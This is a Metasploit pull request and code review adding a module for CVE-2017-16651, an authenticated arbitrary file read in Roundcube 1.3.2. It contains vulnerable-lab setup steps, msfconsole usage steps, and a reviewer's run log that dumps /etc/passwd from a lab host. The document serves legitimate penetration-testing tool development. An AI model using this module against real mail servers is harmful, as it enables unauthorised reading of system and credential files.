### PR TITLE
roundcube arbitrary file read (CVE-2017-16651)

### PR DESCRIPTION
**Pull request by 6a6f656c**
Vulnerable Application; Roundcoube Webmail allows unauthorized access to arbitrary files on host's filesystem.

### Install Roundcube 1.3.2 on Ubuntu 22.04

Instructions are loosely based on https://www.digitalocean.com/community/tutorials/how-to-install-your-own-webmail-client-with-roundcube-on-ubuntu-16-04

The main point of pain is installing PHP 7.0 on Ubuntu 22.04

#### Install LAMP

```
sudo apt-get install -y tasksel
sudo tasksel install lamp-server
```

#### Install PHP 7.0

```
sudo apt install software-properties-common ca-certificates lsb-release apt-transport-https dbconfig-sqlite3 php7.0-sqlite3
LC_ALL=C.UTF-8 sudo add-apt-repository ppa:ondrej/php
sudo apt update
sudo apt-get install php7.0 php7.0-xml php7.0-mbstring php7.0-intl php7.0-zip
sudo a2dismod php8.1
sudo a2enmod php7.0
```

#### Configure PHP

```
sudo nano /etc/php/7.0/apache2/php.ini
```

Uncomment the following lines:

```
extension=php_mbstring.dll
extension=php_xmlrpc.dll
extension=php_pdo_sqlite.dll
```

Add the following line to the end of the extension list:

```
extension=dom.so
```

Uncomment and change the following values:

```
date.timezone = "America/New_York"
upload_max_filesize = 12M
post_max_size = 18M
mbstring.func_overload = 0
```

Save and close the file, now reload Apache

```
sudo systemctl restart apache2
```

#### Install dovecot

```
sudo apt install dovecot-imapd
```

#### Install Roundcube

```
wget https://github.com/roundcube/roundcubemail/releases/download/1.3.2/roundcubemail-1.3.2-complete.tar.gz -O /tmp/roundcubemail-1.3.2-complete.tar.gz
sudo tar -zxf /tmp/roundcubemail-1.3.2-complete.tar.gz -C /var/www/html/
sudo chown -R root:root /var/www/html/roundcubemail-1.3.2/
```

Browse to `/installer`.  Almost all settings will be kept as default,
however, for the database setup we'll use a sqlite db for ease.
Select `SQLite`, and change the Database name to `/tmp/roundcube.db`.
all other fields within `db_dsnw` should be blank.

On the next screen, make sure to click the button under Check DB config
to create the initial database.

## Verification

List the steps needed to make sure this thing works
- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/gather/roundcube_auth_file_read`
- [ ] Do: `set rhost [ip]`
- [ ] Do: `set USERNAME [username]`
- [ ] Do: `set PASSWORD [password]`
- [ ] Do: `run`
- [ ] You should get contents of specified file.

### CODE REVIEW

**Comment by bwatters-r7** [comment]
OK, so with some modifications, I was able to get to the installer; I'll put together the changes and comment it, but at no point in either the above instructions or the Digital ocean link do we set a password- what password does this module use?

**Comment by h00die** [comment]
Good point, you'll need to make a Linux user, and the password is the same as you set on the console (bash, not roundcube)

**Comment by bwatters-r7** [comment]
```
msf6 auxiliary(gather/roundcube_auth_file_read) > show options

Module options (auxiliary/gather/roundcube_auth_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/passwd      yes       The file to read
   PASSWORD                    yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Roundcube Application
   USERNAME                    yes       User to login with
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/roundcube_auth_file_read) > set rhost 10.5.134.129
rhost => 10.5.134.129
msf6 auxiliary(gather/roundcube_auth_file_read) > set password v3Mpassword
password => v3Mpassword
msf6 auxiliary(gather/roundcube_auth_file_read) > set username msfuser
username => msfuser
msf6 auxiliary(gather/roundcube_auth_file_read) > run
[*] Running module against 10.5.134.129

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
whoopsie:x:117:124::/nonexistent:/bin/false
sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
msfuser:x:1000:1000:msfuser,,,:/home/msfuser:/bin/bash
fwupd-refresh:x:128:136:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
dovecot:x:129:137:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:130:138:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin

[*] Auxiliary module execution completed
msf6 auxiliary(gather/roundcube_auth_file_read) > 

```

File: documentation/modules/auxiliary/gather/roundcube_auth_file_read.md [hunk 1]
```diff
@@ -0,0 +1,165 @@
...
+```
+
+#### Install Roundcube
+
+```
+wget https://github.com/roundcube/roundcubemail/releases/download/1.3.2/roundcubemail-1.3.2-complete.tar.gz -O /tmp/roundcubemail-1.3.2-complete.tar.gz
+sudo tar -zxf /tmp/roundcubemail-1.3.2-complete.tar.gz -C /var/www/html/
+sudo chown -R root:root /var/www/html/roundcubemail-1.3.2/
+```
+
```
Comment (bwatters-r7) [inline documentation/modules/auxiliary/gather/roundcube_auth_file_read.md:81]: #### Configure Apache
```
sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/roundcubemail-1.3.2-complete.config
sudo vi /etc/apache2/sites-available/roundcubemail-1.3.2-complete.config
```

Update
`ServerName <rhost IP>`
`DocumentRoot /var/www/html/roundcubemail-1.3.2/`

Save and close the file, now reload Apache

```
sudo systemctl restart apache2
```

File: documentation/modules/auxiliary/gather/roundcube_auth_file_read.md [hunk 2]
```diff
@@ -0,0 +1,165 @@
...
+upload_max_filesize = 12M
+post_max_size = 18M
+mbstring.func_overload = 0
+```
+
+Save and close the file, now reload Apache
+
+```
+sudo systemctl restart apache2
+```
```
Comment (bwatters-r7) [inline documentation/modules/auxiliary/gather/roundcube_auth_file_read.md:66]:
```suggestion
```

File: modules/auxiliary/gather/roundcube_auth_file_read.rb [hunk 3]
```diff
@@ -0,0 +1,115 @@
...
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to login with', '']),
+        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
```
Comment (bwatters-r7) [inline modules/auxiliary/gather/roundcube_auth_file_read.rb:49]:
```suggestion
        OptString.new('USERNAME', [ true, 'Local user to login with', '']),
        OptString.new('PASSWORD', [ true, 'Local password to login with', '']),
```

**Review by bwatters-r7 — COMMENTED** [review]
Just some slight changes.

File: modules/auxiliary/gather/roundcube_auth_file_read.rb (hunk 3 above)
Comment (cudalac) [reply modules/auxiliary/gather/roundcube_auth_file_read.rb:49]: Yes, i agree; email as the descriptor.

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds a module to retrieve and arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

**Pull request merged**